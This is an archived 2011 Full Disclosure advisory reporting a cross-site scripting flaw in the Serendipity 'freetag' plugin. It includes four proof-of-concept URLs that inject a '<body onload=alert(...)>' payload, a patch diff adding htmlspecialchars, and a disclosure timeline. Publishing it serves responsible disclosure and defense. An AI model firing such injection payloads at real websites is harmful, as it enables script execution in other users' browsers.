Full Disclosure mailing list archives
Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
From: "sschurtz () t-online de" <sschurtz () t-online de>
Date: Tue, 31 May 2011 18:14:16 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag" Advisory ID: SSCHADV2011-004 Author: Stefan Schurtz Affected Software: Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21 Vendor URL: http://www.s9y.org Vendor Status: Version 3.22 - Fix possible XSS CVE-ID: - ========================== Vulnerability Description: ========================== This is Cross-Site Scripting vulnerability ================== Technical Details: ================== http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)> http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))> http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)> http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))> ========= Solution: ========= Update to the latest version 3.22 diff serendipity_event_freetag.php < <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $
<?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24
garvinhicking Exp $ < $propbag->add('version', '3.21');
$propbag->add('version', '3.22');
< $serendipity['smarty']->assign('freetag_tagTitle', is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag);
$serendipity['smarty']->assign('freetag_tagTitle',
htmlspecialchars(is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag)); ==================== Disclosure Timeline: ==================== 30-May-2011 - informed developers 30-May-2011 - Release date of this security advisory 30-May-2011 - Version 3.22 - Fix possible XSS 31-May-2011 - post on BugTraq and Full-disclosure ======== Credits: ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References: =========== http://www.s9y.org http://www.rul3z.de/advisories/SSCHADV2011-004.txt http://ha.ckers.org/xss.html http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html http://www.securityfocus.com/archive/1/518191/30/0/threaded -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEUEARECAAYFAk3lE9gACgkQg3svV2LcbMCkTQCXaQJI6tF86BjiD39MoyApw7u0 JACfc3zu6QhrU4tKsvR3IVCucPw69sg= =6mbq -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag" sschurtz () t-online de (May 31)